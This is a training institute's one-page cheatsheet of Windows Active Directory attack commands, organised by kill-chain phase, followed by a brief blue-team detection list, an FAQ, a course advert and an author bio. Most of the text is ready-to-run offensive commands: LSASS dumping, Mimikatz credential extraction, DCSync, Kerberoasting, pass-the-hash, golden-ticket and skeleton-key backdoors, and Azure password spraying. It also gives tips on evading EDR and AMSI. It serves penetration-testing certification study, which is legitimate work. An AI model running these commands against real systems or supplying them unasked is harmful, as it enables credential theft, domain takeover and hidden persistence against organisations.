One-page Windows Active Directory attack cheatsheet — every command Indian red teamers reach for in real engagements in 2026, organised by phase of the kill chain. Pair with our full Active Directory Pentest Guide India 2026 for the explanation behind each technique.

Bookmark, print, and keep open during OSCP, CRTO, and real engagements.

1. Enumeration (post-foothold)

# From Linux (unauthenticated)
nxc smb target -u '' -p '' --shares
ldapsearch -x -H ldap://target -s base '(objectClass=*)'
impacket-GetADUsers -dc-ip target -all DOMAIN/user:pass

# From Windows — PowerView / SharpView
Get-NetDomain
Get-NetDomainController
Get-NetUser | select samaccountname,description
Get-NetGroupMember -GroupName "Domain Admins"
Get-NetComputer | select name,operatingsystem
Get-NetOU -FullData
Find-LocalAdminAccess
Find-DomainShare -CheckShareAccess

# BloodHound collection
# From Linux
bloodhound-python -d domain.local -u user -p pass -dc dc01.domain.local -c all
# From Windows
.\SharpHound.exe -c All

# LDAP dump (creds not required if anonymous bind works)
windapsearch -d domain.local --dc-ip target --users --groups --computers

2. Credential attacks

Kerberoasting

# Linux
impacket-GetUserSPNs -request -dc-ip DC_IP DOMAIN/user:pass

# Windows — Rubeus
Rubeus.exe kerberoast /outfile:spns.txt
Rubeus.exe kerberoast /user:svc_sql /outfile:hash.txt
Rubeus.exe kerberoast /nowrap /rc4opsec   # only RC4 tickets (more crackable)

# Crack offline
hashcat -m 13100 spns.txt rockyou.txt --rules=OneRuleToRuleThemAll.rule

AS-REP Roasting

impacket-GetNPUsers DOMAIN/ -usersfile users.txt -no-pass -dc-ip DC
Rubeus.exe asreproast /nowrap /outfile:asrep.txt
hashcat -m 18200 asrep.txt rockyou.txt

LSASS dump (local admin required)

# LOLBin comsvcs.dll (least detected)
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump [LSASS_PID] C:\temp\lsass.dmp full

# Microsoft-signed procdump
procdump.exe -ma lsass.exe lsass.dmp

# Task Manager GUI (most stealthy against some EDRs)
# taskmgr → right-click lsass.exe → Create dump file

# Parse offline
pypykatz lsa minidump lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" exit

DCSync (need DS-Replication-Get-Changes-All right)

impacket-secretsdump DOMAIN/user:pass@DC
impacket-secretsdump -just-dc-user Administrator DOMAIN/user:pass@DC
mimikatz: lsadump::dcsync /domain:domain.local /user:krbtgt

3. Privilege escalation

Local priv-esc recon

# Automated
winPEAS.exe
Invoke-PrivescCheck.ps1

# Manual checks
whoami /priv
whoami /groups
net localgroup administrators

SeImpersonate / SeAssignPrimaryToken abuse

# If you have SeImpersonate and are on a service account
PrintSpoofer.exe -i -c cmd.exe     # Windows 10 < 21H1
GodPotato -cmd "cmd /c whoami"     # newer Windows, .NET potato
RoguePotato.exe -r 10.10.10.10 -c "cmd /c whoami" -l 9999

Certipy / ADCS exploitation

# Enumerate vulnerable templates
certipy find -u user@domain -p pass -dc-ip DC

# ESC1 — request cert as Domain Admin
certipy req -u user@domain -p pass -ca CA-NAME -template VulnTemplate -upn administrator@domain

# Authenticate with cert → get NT hash
certipy auth -pfx administrator.pfx

4. Lateral movement

Pass-the-Hash (PtH)

# Linux
impacket-psexec DOMAIN/user@target -hashes :NTHASH
nxc smb target -u user -H NTHASH -x whoami
nxc winrm target -u user -H NTHASH -X "ipconfig"

# Windows — Mimikatz
sekurlsa::pth /user:Administrator /domain:domain.local /ntlm:HASH /run:cmd.exe

Pass-the-Ticket (PtT)

# Linux — convert Windows .kirbi to .ccache
impacket-ticketConverter ticket.kirbi ticket.ccache
export KRB5CCNAME=$PWD/ticket.ccache
impacket-psexec -k -no-pass DOMAIN/target

# Windows — Rubeus
Rubeus.exe ptt /ticket:base64_ticket
Rubeus.exe asktgt /user:Administrator /rc4:HASH /ptt

Over-Pass-the-Hash

Rubeus.exe asktgt /user:Administrator /ntlm:HASH /domain:domain.local /dc:DC /ptt

Remote exec options

# By noise level — quietest first
winrm → psexec → wmiexec → smbexec

impacket-wmiexec DOMAIN/user:pass@target
impacket-psexec DOMAIN/user:pass@target
impacket-smbexec DOMAIN/user:pass@target
evil-winrm -i target -u user -p pass

# NetExec (successor to CrackMapExec) — fantastic all-in-one
nxc smb target -u user -p pass --shares
nxc smb target -u user -p pass -x "whoami"
nxc winrm target -u user -p pass -X "ipconfig"
nxc ldap target -u user -p pass --trusted-for-delegation

5. Persistence

Golden Ticket

# Need krbtgt hash first (from DCSync)
mimikatz:
kerberos::golden /user:backdoor /domain:domain.local /sid:S-1-5-21-xxx /krbtgt:HASH /id:500 /ptt
# Then any kerberos command works as Domain Admin for 10 years

Silver Ticket

mimikatz:
kerberos::golden /user:svc_admin /domain:d.local /sid:S-1-5-21-xxx /target:server.d.local /service:cifs /rc4:NTHASH_OF_SERVICE_ACCOUNT /ptt

AdminSDHolder ACL

# Grant GenericAll on AdminSDHolder → propagates to all protected objects every 60 minutes
Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=domain,DC=local" -PrincipalIdentity backdoor -Rights All

Skeleton Key (on DC with SYSTEM)

mimikatz: privilege::debug
         misc::skeleton
# Now any account works with password "mimikatz"

6. Hybrid / Azure AD attacks

# ROADtools — AAD recon
roadrecon auth -u user@domain.onmicrosoft.com -p pass
roadrecon gather
roadrecon gui

# AADInternals — swiss army for AAD
Import-Module AADInternals
Get-AADIntLoginInformation -UserName user@target.com
Get-AADIntTenantDetails -DomainName target.com

# MSOLSpray — password spray against Azure
python3 MSOLSpray.py --userlist users.txt --password 'Welcome@2026' --sleep 300

# TokenTactics — primary refresh token abuse
Get-AzureToken -Client MSTeams
Get-TenantID -Domain target.com
Connect-MgGraph -AccessToken $token

OPSEC tips for modern engagements

• Avoid mimikatz.exe unobfuscated — every EDR detects it. Use in-memory invoke (e.g. Invoke-Mimikatz with AMSI bypass) or compile your own variant
• LSASS dumping: prefer comsvcs.dll or PPLdump over direct Mimikatz on a live host
• Use NTLM less — modern AD environments alert on NTLM from non-standard sources. Prefer Kerberos + PtT/over-PtH
• BloodHound collections are VERY noisy — use -c Session,Group,Acl,Trusts rather than -c All on red-team engagements
• Don’t Kerberoast from the same user that phished in — separate recon account from exploitation account
• Stay under 10 LDAP queries per minute — slow and deliberate beats fast and caught

What blue teams will detect

• Kerberoasting: Event 4769 with RC4 encryption type
• AS-REP roast: Event 4768 with pre-auth off + unusual source
• LSASS access: Sysmon Event 10 with unusual process
• DCSync: Event 4662 on DC with specific GUID
• Golden Ticket: anomalous TGT lifetime + impossible logons
• PtH: Event 4624 logon type 9 with NTLM from non-local source

See our SOC Analyst Training India 2026 for blue-team detection engineering.

FAQ

Which cheatsheet tool do I learn first — BloodHound or Mimikatz?

BloodHound. Without understanding relationships, Mimikatz output is just text dumps. BloodHound tells you what to steal; Mimikatz helps you steal it.

Does this cheatsheet cover the OSCP AD section?

Yes. Sections 1-4 cover every technique on the current OSCP exam AD set. Section 5 and 6 are for CRTO-level work, beyond OSCP scope.

Do I need Cobalt Strike to learn these?

No. Every command here runs with free open-source tools. Cobalt Strike adds OPSEC and command-and-control management but no new fundamental capability.

NetExec vs CrackMapExec — same tool?

NetExec (nxc) is the active successor fork of CrackMapExec after the original repository stopped receiving updates in 2024. Same syntax, more protocols, more checks. Use NetExec in 2026.

Is MITRE ATT&CK mapping worth learning for OSCP/CRTO?

Less for OSCP, more for CRTO. OSCP tests if you can get in and get DA. CRTO tests if you can describe the tradecraft professionally — MITRE mapping is increasingly expected in red team reports for senior roles.

Train in the real kill chain

Macksofy OSCP Bootcamp includes 30+ hours of AD lab time with BloodHound, Kerberoasting, and ADCS practice — mapped exactly to OSCP’s exam AD set. Our CRTO mentorship programme extends into full Cobalt Strike, ADCS ESC1-13, and Azure AD attack chains. Contact us for next batch dates.

Also read our CRTO vs OSCP comparison to decide which certification to tackle first.

References

• BloodHound Community Edition
• GhostPack Rubeus
• NetExec (nxc)
• Certipy
• The Hacker Recipes — AD encyclopaedia
• MITRE ATT&CK Enterprise

Yasir Arafat

Yasir Arafat is the founder of Macksofy Trainings and a practicing cybersecurity strategist focused on offensive security training, SOC operations, and India-specific cybersecurity career development. Yasir has built Macksofy's EC-Council Accredited Training Center in Mumbai and its branches in Hyderabad, Dubai, and Toronto, growing the institute into one of India's leading certification partners for OSCP, CEH v13, CPENT, and SOC-200 programs. He writes and reviews training curriculum, mentors students through certification exams, and advises corporate clients on security-team hiring and upskilling. Contact: yasir@macksofy.com.

See Full Bio

Yasir Arafat

Yasir Arafat is the founder of Macksofy Trainings and a practicing cybersecurity strategist focused on offensive security training, SOC operations, and India-specific cybersecurity career development. Yasir has built Macksofy's EC-Council Accredited Training Center in Mumbai and its branches in Hyderabad, Dubai, and Toronto, growing the institute into one of India's leading certification partners for OSCP, CEH v13, CPENT, and SOC-200 programs. He writes and reviews training curriculum, mentors students through certification exams, and advises corporate clients on security-team hiring and upskilling. Contact: yasir@macksofy.com.